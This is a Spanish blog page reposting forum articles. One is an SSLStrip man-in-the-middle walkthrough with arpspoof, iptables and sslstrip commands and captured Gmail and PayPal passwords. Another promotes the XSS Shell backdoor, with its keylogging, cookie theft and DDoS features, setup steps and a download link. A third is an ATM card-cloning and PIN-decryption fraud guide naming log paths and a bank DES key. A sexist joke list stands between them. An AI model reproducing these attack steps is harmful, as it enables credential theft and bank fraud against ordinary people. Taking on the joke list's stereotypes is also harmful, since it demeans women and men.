Banner 1

Desmitificando la seguridad de HTTPS con SSLStrip

0 comentarios
Este es un buen post que vi en la red de dragon hecho por seidfreed.

----------------------------------------------------------------------------------------------------
Hola!
Muy buenas a todos/as!
Utilizamos hoy en día Internet para muchas cosas, mirar nuestro correo, mantenernos comunicados con la gente, conexiones a bancos etc…
Nadie nos ha enseñado a navegar de manera segura pero conocemos conceptos como:

  1. Siempre que vayas a poner datos de carácter personal que la conexión sea segura que ponga HTTPS.
  2. Que nos fijemos en la imagen del candadito
Algo así como esto:

HTTPS no es tan seguro como nos creemos, tiene debilidades, haremos una prueba de concepto.
El diagrama de red sería el siguiente

Este es el escenario planteado.
Suponemos que conocemos la IP del atacante.
Habilitamos el Forwanding en la máquina atacante
root@bt:~# echo “1″ > /proc/sys/net/ipv4/ip_forward
Ahora mediante ARPSPOOF haremos un ataque man in the middle
root@bt:~# arpspoof -i eth0 -t 192.168.78.137 192.168.78.2
Veremos como se hace el ataque de man in the middle
0:c:29:72:9a:32 0:c:29:e4:a8:97 0806 42: arp reply 192.168.78.2 is-at 0:c:29:72:9a:32
Primero hemos de poner la IP de la máquina a la que atacamos y después la IP del router
Ahora mediante IPTABLES hacemos la redirección de puertos
root@bt:~# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
Ahora activamos SSLSTRIP
root@bt:~# sslstrip -w passwords
sslstrip 0.6 by Moxie Marlinspike running…
Escribiremos todos lo que recojamos de SSLSTRIP en un fichero llamado passwords
Ahora mediante TAIL iremos viendo lo que sale por pantalla
root@bt:~# tail -f passwords
Ahora cuando la máquina atacante acceda a su correo, a GMAIL por ejemplo
Veremos como nos saca el password en texto plano
2010-07-24 00:36:26,739 SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fm ail.google.com%2Fmail%2F%3F&service=mail&rm=false& dsh=6669774865561864179&ltmpl=default&ltmpl=defaul t&scc=1&timeStmp=&secTok=&GALX=dPSLG5jykg8&Email=mriverolopez&Passwd=CONTRASEÑA&rmShown=1&signIn=Acceder&asts=
Y ahí tenemos la dirección de email y la contraseña, este caso lo hemos echo con gmail, probemos por ejemplo con…paypal
2010-07-24 01:47:25,907 SECURE POST Data (www.paypal.com):
login_cmd=&login_params=&login_email=Seifreed&login_password=CONTRASEÑA&target_page=0&submit.x=
Ya hemos visto lo sencillo que es capturar los datos de acceso aunque la conexión sea por HTTPS.
La pregunta es.. ¿ Como saber si estamos sufriendo un man in the middle ?
Una de las maneras sería haciendo un tracert

Como véis primero nos saldría la máquina que no está haciendo el man in the middle y luego nuestro router.
Así que tened cuidadín, desde que ubicaciones accedéis a vuestros datos privados.
Un saludo __________________
Mi web:
http://www.seifreed.wordpress.com

Asociación cultural y tecnológica
http://www.badiatech.org

Cursos de informática
aula.badiatech.org

Wikipedia asociación
wiki.badiatech.org

FUENTE:http://comunidad.dragonjar.org/f184/desmitificando-la-seguridad-de-https-con-sslstrip-10325/

Cosas para Tener En Cuenta (Manual para entender a las mujers y hombres)

0 comentarios
MANUAL PRACTICO PARA ENTENDER EL ESPAÑOL DE LAS...!MUJERES!!!!!



NO = Sí.

SI = No.

TAL VEZ = No

LO SIENTO, PERO... = Lo volveré a hacer igual

DECIDE TU = Pero haz lo que digo yo.

ERES LIBRE DE HACER LO QUE QUIERAS = Ni se te ocurra hacerlo.

HAZ LO QUE QUIERAS = Pero lo pagarás caro.

NO, NO ESTOY ENOJADA = Por supuesto que estoy enojada......., IMBECIL!!

TE ESTAS DURMIENDO? = No te duermas!!.

ESTA NOCHE ESTAS MUY CARIÑOSO = No tengo ganas de hacer el amor.

ESTOY GORDA (FLACA)? = Dime que estoy Buenísima.

APAGA LA LUZ = Tengo Celulitis

QUIERO CAMBIAR ESTAS CORTINITAS = y las alfombras...y la pintura...y los muebles...

ES QUE ESTA COCINA ES TAN CHIQUITA = Quiero una casa nueva.

ME AMAS? = Te voy a pedir algo.

QUE TANTO ME AMAS? = y cuesta mucho dinero

NECESITARIAMOS = Yo Quiero.

TENEMOS QUE HABLAR = Necesito quejarme de algo.

CREO QUE NO NOS COMUNICAMOS LO SUFICIENTE = Tienes que estar de acuerdo conmigo

-----------------------------------------------------------------------------------------------------------------------------------



MANUAL PRACTICO PARA ENTENDER EL ESPAÑOL DE LOS...!HOMBRES!

TENGO HAMBRE = Tengo hambre

TENGO SUEÑO = Tengo sueño

ESTOY CANSADO = estoy cansado

HABLEMOS = Estoy tratando de impresionarte, para que pienses que soy un hombre profundo y accedas a tener sexo conmigo

PARECES TENSA, TE DOY UN MASAJE? = Primero te meto mano, después quiero sexo contigo.

ME CONCEDES ESTA PIEZA? = Quiero sexo contigo

TE GUSTARIA IR AL CINE CONMIGO = Quiero sexo contigo

QUIERES CENAR CONMIGO HOY EN LA NOCHE = Quiero sexo contigo

TE PUEDO LLAMAR EL VIERNES? = Quiero sexo contigo

TE QUIERES CASAR CONMIGO = Quiero que sea ilegal para tí acostarte con otro hombre que no sea yo.

(DE COMPRAS) SI, TE QUEDA BONITO, QUE BONITO ESE VESTIDO = Agárralo de una vez y vámonos de esta friega.

SI, TE QUEDA BIEN = Qué buena estás!!.

EL NUEVO CORTE = te quedaba mejor el anterior.

SI, TE QUEDA BIEN EL NUEVO CORTE = $30.000 pa' la basura!!.

PERO CUAL ES EL PROBLEMA? = No entiendo la tragedia.

QUE TE PASA? = Cuál trauma psicológico auto-inventado te afecta hoy

ESTAS BRAVA? = me imagino que esta noche, nada de sexo.

ESTOY ABURRIDO = Tenemos sexo?.

TE AMO = Necesito sexo YA!!.

YO TAMBIEN TE AMO =OK, Estás contenta?.Podemos comenzar con el sexo? 
En realidad los manuales son 100% practicos como lo pueden ver , se garantiza un 99.9999% de que lo aqui contenido es real. Fuente: http://www.taringa.net/posts/humor/7220699/Cosas-para-Tener-En-Cuenta-_D-No-Te-La-Creas_-xD.html

Xss Shell[Explicacion+Video+Descarga]

2 comentarios
 Este articulo tambien lo encontre via disodelared en el blog de Overflow , me parese buen tema asi que lo comparto.

------------------------------------------------------------------------------------------------------------------

Esto es una traduccion de google.
Fuente:darknet.org.uk

XSS Shell es una puerta trasera XSS gran alcance que permite obtener de forma interactiva el control de un cross-site scripting (XSS) en una aplicación web. Demuestra el poder real y el daño de los ataques de cross-site scripting.

¿QUE ES LA SHELL XSS?


XSS Shell es de gran alcance una puerta trasera XSS y gerente zombi. Este concepto presentado por XSS-proxy (http://xss-proxy.sourceforge.net/). Normalmente, en ataques XSS atacante tiene una oportunidad, en forma interactiva XSS Shell puede enviar peticiones y obtener respuestas de la víctima, puede puerta trasera de la página.

Puedes robar autenticación básica, usted puede saltarse restricciones de la propiedad intelectual en los paneles de administración, puede DDoS algunos sistemas con una permanente vulnerabilidad XSS etc posibilidades de ataque son limitados con las ideas. Básicamente esta herramienta demuestra que se puede hacer más con XSS.

CARACTERISTICAS

XSS Shell tiene varias características para tener acceso a toda víctima. También puede simplemente añadir sus propios comandos.

La mayoría de las características se pueden habilitar o deshabilitar desde la configuración o puede ser ajustado desde el código fuente.

Características:

* Páginas de regeneración
* Keylogger
* Mouse Logger (puntos clic actual DOM)

Incorporado en los mandos:

* Obtener datos Keylogger
* Obtener la página actual (actual prestados DOM / captura de pantalla como)
* Obtener Cookie
* Ejecutar JavaScript suministrado (eval)
* Obtener Portapapeles (sólo para IE)
* Obtener dirección IP interna (JVM sólo Firefox)
* Revise las víctimas visitaron historial de URL
* DDoS
* Fuerza al navegador de la víctima de Crash

Instalacion
-
XSS Shell utiliza ASP + base de datos MS Access como backend, pero puedes simplemente puerto en cualquier otra solución de servidor. Sólo tiene que seguir con el protocolo de comunicación simple.


Instalar la interfaz de administración;

1. Copiar "xssshell" carpeta en su servidor web
2. Copiar "db" a un lugar seguro (por debajo de la raíz)
3. Configurar "ruta de acceso base de datos" de "xssshell / db.asp"
4. Modificar fuertemente codificados contraseña en db.asp [contraseña por defecto es:] w00t
5. Ahora usted puede tener acceso a la interfaz de administración de algo como http:// [YOURHOST] / xssshell /


Configurar XSS Shell para la comunicación;
1. Abrir xssshell.asp
2. Set "SERVER" variable a la carpeta donde se encuentra XSSShell. i.e: "http:// [YOURHOST] / xssshell /";
3. Asegúrese de revisar "ME", "Conexión", "COMMANDS_URL" variables. Si ha cambiado los nombres de archivo, nombres de carpetas o algún tipo de configuración diferente que necesita modificarlos.

Ahora abra su interfaz de administración desde el navegador,
Para probarlo, basta con modificar "sample_victim / default.asp" código fuente y reemplazar "http://attacker:81/release/xssshell.js" URL con su propia URL del tipo XSS Shell. Abrir "sample_victim" carpeta en cualquier otro navegador y puede ser subido a otro servidor.

Ahora debería poder ver un zombi en la interfaz de administración. Sólo tiene que escribir algo en "parámetros" área de texto y haga clic en "alert ()". Usted debe ver un mensaje de alerta en el navegador de la víctima.

Video De Una Xss Shell Funcionando



Descarga
http://www.megaupload.com/?d=XZMGB24Z

Hacking Atm`s cajeros automaticos

1 comentarios
Esto lo encontre via diosdelared en el blog de ze0max , me paresio interezante y lo comparto con el blog.

--------------------------------------------------------------------------------------------------------------

 
FUENTE PARA SI QUIEREN LEERLO MEJOR AQUI NO SE ILUSTRA MUCHO
http://zer0max.atspace.com/




La informacion aqui presentada es solo para fines educativos no me hago responsable de los hechos
Bueno para comenzar explicare conceptos de los Atm's.

Atm's cajeros automaticos:Un cajero automático, de sus siglas en inglés "Automated Teller Machine" es un ordenador
modificado con 2 interfaces de administración, en el 90% de los casos.ya que hay atm´s portátiles,pero el tema de hoy nos compete a tratar sobre esos
atm´s que están pegados a las paredes de los bancos y que tanta curiosidad y misterio ocultan.

Estructura de un atm:
interfaz usuario que esta formado por el monitor ,teclado, lector de banda magnetica, tickera y dispensador de billetes!!

Banco: institucion financiera que administra divisas y a el dinero de sus clientes, estos no fabrican cajeros automaticos.

Empresas fabricadoras de Atm's :DIEBOLD - WINCOR NIXDORF - NCR e INTERBOLD.Hay muchas mas pero estas son las mas importantes.

Proceso de operacion en atm's interfaz-cliente:
1.-Inserta tarjeta de credito o debito
2.-Digita PIN(numero confidencial).
3.Realiza su operacion bancaria

Tecnicos de Atm's: realizan cursos en la empresa fabricante de cajeros que le vendió al banco.

En estos tres procesos el atm lee la informacion contenida en la banda magnetica que como algunos saben se les llama TRACKS o DUMPS pero en este caso
es específicamente el TRACK 2, luego verifica el PIN y lo encripta y si los datos son correctos, que sucede?, pues existe una gran red bancaria llamada
CIRRUS,SWITCH 7B, MAESTRO, CONEXUS nuestro banco conecta con el y nos permite realizar la operación que hayamos seleccionado.

Hay otra interface de administración que está oculta detrás de la pared, y contiene: monitor, conector para teclado, puertos usb, hasta floopy xD, caja de recarga de billetes!! y una especie de tickera en algunos modelos. Es obvio que los usuarios no lo pueden tocar, pero hay personal que si lo hace. Son los técnicos de atm´s, que hicieron cursos en la empresa fabricante de cajeros que le vendió al banco.

En la interface se ocultan muchas cosas y dependiendo de nuestra suerte y podamos contactar con algun tecnico,imaginense si esto ocurriera xdd , pss si lo es
asi de verdad,yo zer0max conosco gente que hace este tipo de trabajo y quiero decirles que hay mucha gente en esto, mas adelante les platico mas de esto.

Bueno primero mas que nada hablaremos de DIEBOLD, que quizas ya lo conoscas es una empresa muldialmente conocida,esta se encarga de vender atm´s a todos los bancos del mundo,estos ATMS son facil de conocer porque tienen el logotipo de DIEBOL impreso en la interfaz de usuario.


Que es lo que pasa cuando insertan los clientes sus tarjetas de debito y hacen una operación?
Lo que sucede es que su transacion es logueada en el HD del atm, asi como lo oyen los atms tienen discos duros,claro son ordenadores modificados pero estos
que sistema operativo creen que trae?, linux? no para nada traeN un simple windows xp upss ...

aqui una captura de una ventana de win xp en un ATM lol


La empresa diebold ha lanzado muchos modelos, entre ellos la serie optiva, con procesadores PIV, con Windows XP instalado! y corren el sistema AGILIS ,que es un programa fabricado por la DIEBOLD y que se puede modificar para que cuando te acerques al ATM veas el logo de tu banco diciéndote: Inserte su tarjeta.

Habiamos comentado que los ATM'S tienen un disco duro,pues ahi en ese disco duro se almacenan las transaciones de los clientes en forma secuencial.

Vino el nesock inserto su tarjeta en el ATM, digitó su PIN e hizo una consulta.
El atm logueo la operacion de esta manera:

;xxxxxxxxxxxxxxxx=xxxxxxxxxxxxxxxxxxxx? <<

A1B2C3D4E5F601FF<<< se cifró el PIN (1234) fue lo que insertó "es solo un ejemplo"

operación: CONSULTA<<<] se registró el tipo de transacción

Luego vino Bx que estaba atras de nesock esperando turno inserto su tarjeta en el ATM, digitó su PIN e hizo un retiro

;xxxxxxxxxxxxxxxx=xxxxxxxxxxxxxxxxxxxx? <<< se leyó el track 2 de la tarjeta

FFFFAAAA541D2EAF<<

operación: RETIRO <<< se registró el tipo de transacción

Asi secuencialmente se guardan esos logs en el disco duro, y el log empieza a crecer.
Logico esto no es el formato en que se guardan los logs,este formato varia segun el fabricante.
Un log de la DIEBOLD no será igual en formato a un log de la WINCOR NIXDORF, y así sucesivamente.

Encriptacion PIN

Qué tipo de cifrado se usa para cifrar el PIN?
Usan DES, Data Encryption Standar, DES se basa en una key (una llave de 16 dígitos en hexa) para cifrar y desencriptar, hay bancos que usan 2DES y 3DES que se basan en 2 y 3 llaves y nos hacen la tarea un poco más difícil.

En resumen, si tenemos esa llave de 16 dígitos en hexa, podemos desencriptar el número de identificación personal que tipio el usuario, y con el TRACK 2 podemos hacer un clon de la tarjeta de débito, pero el principal reto, es obtener el log. ya vamos a eso, xD.

Primero quisiera hablar un poco del proceso de clonacion de tarjetas de credito-debito:

Material necesario

SKIMER


Con este aparito pequeño deslizamos una tarjeta sobre el y los tracks de la banda magnetica se guardan sobre el,este se conecta ala computadora y a quemar tarjetas.
Como las quemo? pss observa ..

MSR


El MSR se encarga de quemar la tarjeta,osea grabar los tracks en la nueva tarjeta en blanco, con la ayuda de un software


Ya tenemos todo vamos con la tarjeta en blanco a un atm la

Track2+tarjeta en blanco+msr+sofwarer+pin obtenido+tecnico atm =Mucho Cash en atm xddd

A pero no he explicado como decifrar el PIN es la intencion

Voy a decir que ese log en la serie optiva de la DIEBOLD, se encuentra en el archivo message.trc dentro de la ruta c:\diebold\css\
haciendo un análisis del message.trc tendríamos:

message.trc de la diebold están registrados entre el ; y el ?

6012883350096006=11111200000004919321

Este track2 contiene la numeración que está impresa en la tarjeta de debito: 6012883350096006

Guauuuu un banco xd , psss cada entidad tiene su propia numeración, pero el punto es que con este track, podemos construir una tarjeta de debito idéntica,
o sea un clon(como les comente arriba). También podemos apreciar el PIN que está cifrado y que es : =254=967:658==>

Para poder desencriptarlo necesitamos conocer la nomenclatura para llevarlo a hexa.
La nomenclatura es la siguiente y según veo se comporta como un estándar bancario

A es :
B es ;
C es <
D es =
E es >
F es ?

Con esta pequeña tabla podemos traducir: =254=967:658==> a AD254D967A658DDE

Una vez que tenemos el PIN en sus 16 dígitos hexa, necesitamos la llave DES (KEY DES) para desencriptarlo. En este caso la llave DES para desencriptarlo es
0123456789abcdef

es algo facil no? bueno esa era la llave DES que usaba BANESCO jaja, creo saber que le dieron durisimo este año.

Como la desencriptamos? no creo que tenga que responder eso, hay muchos programas para hacerlo que usan el algoritmo DES. como crypto calculator III , atmdes, safedes, etc.
El PIN desencriptado sería 6158FFFFFFFFFFFF
donde 6158 sería el PIN de cuatro dígitos que tipio el cliente, y F sería el path.
Con estos datos ya podríamos hacer una consulta, ya que hay hardware para grabar en bandas magnéticas, como la famosa msr206, etc.
Pienso extender esto ya que merece interés, doy esta información porque pienso que se debe saber el por qué de las cosas. ¿Son tan seguros los bancos administrando nuestro dinero? me temo que no xD.

Antes de despedirme quiero contar una anecdota.

Yo zer0max tengo un amigo de aqui de mi ciudad el men se dedica a esto,me acuerdo andaba en banking conmigo hace tiempo con bancomer pero nos fallo por falta de tiempo,ahora el contactó con un tecnico de ATM que se encarga de sacar los logs del disco duro del ATM y unos amigos que concocen Desencriptan el PIN usando el DESKEY del banco dado.


FUENTE PARA SI QUIEREN LEERLO MEJOR AQUI NO SE ILUSTRA MUCHO
http://zer0max.atspace.com/

 
Powered by Bad Robot
Helped by Blackubay